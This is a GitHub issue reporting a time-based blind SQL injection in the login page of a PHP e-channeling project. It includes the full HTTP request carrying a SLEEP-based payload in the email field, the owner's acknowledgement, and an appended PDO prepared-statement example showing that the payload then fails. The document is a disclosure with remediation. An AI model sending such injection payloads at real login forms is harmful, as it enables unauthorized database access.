Blind sql injection in login page #1

Open
az7rb opened this issue Jun 13, 2022 · 1 comment

az7rb commented Jun 13, 2022

Page: login.php

https://github.com/HashenUdara/edoc-echanneling/blob/main/login.php#L48

HTTP request

POST /cve/php-edoc-echanneling-main/edoc-echanneling-main/login.php HTTP/1.1
Host: localhost
Content-Length: 108
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cve/php-edoc-echanneling-main/edoc-echanneling-main/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=uqsd4tpq8bovkm9uadsfgvpjna
Connection: close

useremail=admin@admin.com' AND (SELECT 7037 FROM (SELECT(SLEEP(5)))FIpv) AND 'bqum'='bqum&userpassword=admin

az7rb changed the title from "sql injection in login page" to "Blind sql injection in login page" on Jun 13, 2022

HashenUdara (Owner) commented

Thanks for reporting this issue. This is my first PHP project. I will fix it.
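
The reported parameter handled with a bound query instead of string-built SQL, as an added example that is not the project's code. It uses PDO with an in-memory SQLite database so it runs offline; the `users` table, its columns, the hashed-password storage and the function names are assumptions, and only the `useremail` field and the reported value come from the issue.

```php
<?php
declare(strict_types=1);

// Assumed shape of the flaw (not copied from login.php): the request value is
// pasted into the SQL text, e.g.  "... WHERE email='" . $_POST['useremail'] . "'"
// so a quote inside useremail closes the literal and the remainder runs as SQL.

// Hardened lookup: the SQL text is constant and the e-mail travels as a bound
// parameter, so the database only ever compares it as a string value.
function findUserByEmail(PDO $db, string $email): ?array
{
    $stmt = $db->prepare(
        'SELECT email, password_hash, usertype FROM users WHERE email = :email'
    );
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Login succeeds only when the row exists and the password matches its hash.
function login(PDO $db, string $email, string $password): bool
{
    $user = findUserByEmail($db, $email);
    return $user !== null && password_verify($password, $user['password_hash']);
}

// Constructed demo data (hypothetical schema and credentials).
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false so the
// statement is prepared by the server rather than interpolated client-side.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (
    email TEXT PRIMARY KEY, password_hash TEXT NOT NULL, usertype TEXT NOT NULL)');
$db->prepare('INSERT INTO users VALUES (?, ?, ?)')->execute(
    ['admin@admin.com', password_hash('correct horse', PASSWORD_DEFAULT), 'a']
);

// The useremail value from the report, passed through the hardened path.
$reported = "admin@admin.com' AND (SELECT 7037 FROM (SELECT(SLEEP(5)))FIpv) AND 'bqum'='bqum";

var_dump(login($db, 'admin@admin.com', 'correct horse')); // valid credentials
var_dump(login($db, $reported, 'admin'));                 // reported value is just a non-matching e-mail
var_dump(login($db, 'admin@admin.com', 'admin'));         // wrong password
```

Because the reported value never becomes part of the statement text, it matches no row and the request returns without the five-second delay that confirmed the injection.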
